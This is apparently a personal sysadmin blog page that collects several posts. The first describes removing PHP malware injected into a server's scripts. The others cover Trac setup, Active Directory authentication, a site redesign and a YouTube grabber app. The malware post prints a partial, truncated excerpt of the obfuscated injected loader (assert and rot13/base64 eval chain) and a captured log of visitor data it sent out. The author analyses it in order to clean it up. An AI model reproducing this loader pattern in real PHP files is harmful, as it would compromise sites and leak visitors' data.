Battle against injected PHP

My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
...etc

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtX...."));'); $strings($light);
//###=CACHE END=###

This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example apache log message generated by someone browsing an infected site:

- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.

Dear Diary: Running Trac and upgrading to Ubuntu Server 14.04

I’m a fairly heavy user of trac. I’ve got various software projects I organize using trac. I decided to upgrade one of my Ubuntu 12.04 servers to Ubuntu 14.04 and of course ran in to the typical apache2 headaches that are born out of this particular transition.

After remembering to rename my virtual host files with .conf extensions (I find that change annoying as hell on its own), I kept running aground with an Internal Server Error message to which I couldn’t even find a hint in my logs, even after cranking up the verbosity.

 

Screen Shot 2014-09-17 at 6.00.23 PM

 

SIGH

Read more “Dear Diary: Running Trac and upgrading to Ubuntu Server 14.04”

Trac Authenticating Through Active Directory

A minor post – mostly for my own notes..

I was setting up an instance of Trac and I wanted Active Directory authentication going. I’ve had this before, but I recently learned of Centrify which provides a VERY easy means to setup system authentication with AD. This meant I needed to find a Centrify-specific way to get AD authentication going in Trac.

I was close to an obvious simple solution for a fair while, but I kept running in to error messages like:

[error] [client jay] GROUP: mrjay not in required group(s)., referer: http://trac/

Here’s the steps I followed that not only get this far, but got past through to working just fine…
Read more “Trac Authenticating Through Active Directory”

Dawning.ca Spruced Up

Previous Dawning.ca Layout
Previous Dawning.ca Layout

I’ve just spent a few hours re-designing the layout of Dawning.ca. The old one served me very well and I really liked it. I had heavily modified the previous theme to work for me and work it did. I may tap it some time in the future as a backup… As you can see to the right, the new style is fairly different compared to the image. Although I kept the workflow as I think it was already pretty good.

Objectives

Basically, I was trying to get the site to be:

  • Simple to use
  • Uncluttered
  • Attractive
  • Professional & Casual
  • Technically Interesting
  • Simple to use
  • Did I mention, simple to use?

I feel I accomplished these goals. Though I felt I had to sacrifice some technically interesting features in order to reduce the clutter. I had made some cool logos awhile ago that looked good on the more cartoony past version of the site, but they looked horrible here. I ultimately decided to just get rid of the top banner all together, I don’t think people need to keep being reminded of what site they’re on. Anyway, comment below eh!?

Technical Blah

I’m using a few css tricks I’ve learned in the last while to round corners, shade and pretty things up. Mainly, for rounded corners I use tricks such as those found here.

In terms of the shading, if you carefully look at my setup, the black gradient on the red background is made from a 1 x 200 px png image file overlayed on a red background. CSS for that trick is that like this:

background-image: url('/media/bkgd.png');
background-repeat: repeat-x;

Most shaded regions are made using 10 x 10 px images repeated that are very transparent png images. I use css nearly identical to that above for this too, only difference is the repeat statement has no -x to it.

I built up the new theme using the very famous and helpful Atahualpa theme. I’ve used this theme for various WordPress websites of mine including those for:

Also, my buddy Devin who I recently helped get his first Apache/MySQL/PHP/WordPress server install going is using the Atahualpa Theme for his website, it truly is a great WordPress theme for both advanced and beginners alike.

Your Turn

What do you all think of my redesign? Any suggestions? What WordPress theme do you use?

YouTube Grabber App

I’ve whipped up this little YouTube video grabber for myself and I’ve opened it up for the moment. If I see it getting spammed or abused in some way, I’ll probably password protect it, nevertheless, you can check it out here.

YouTube Grabber ScreenshotWhat it does

This little app takes a YouTube video link and then adds the reference in a database. A seperate script then polls that database and looks for new URLs. It then uses another script (that I did not write), called yt-download, to fetch each video and dump it to my fileserver.

How it does it

I wrote this application using Django (and therefore Python). Django provides a lot of really helpful database abstraction along with various helpful tools for custom web administration of databases and tools for rapidly created very presentations.. I’m sure a true Django expert would say it’s even more yet.

In addition to Django, my little application runs on an Ubuntu Linux based webserver I run as a Virtual Machine.

The actual fetching of the videos is handled by a script I wrote that uses the Django database framework.. It’s just a few lines and is called by cron.

What it can do for you

Granted people don’t abuse this thing, I don’t mind them submitting videos for the purpose of getting at the mp4 links on the video pages. Of course you can also use it to point me to content that you think is awesome.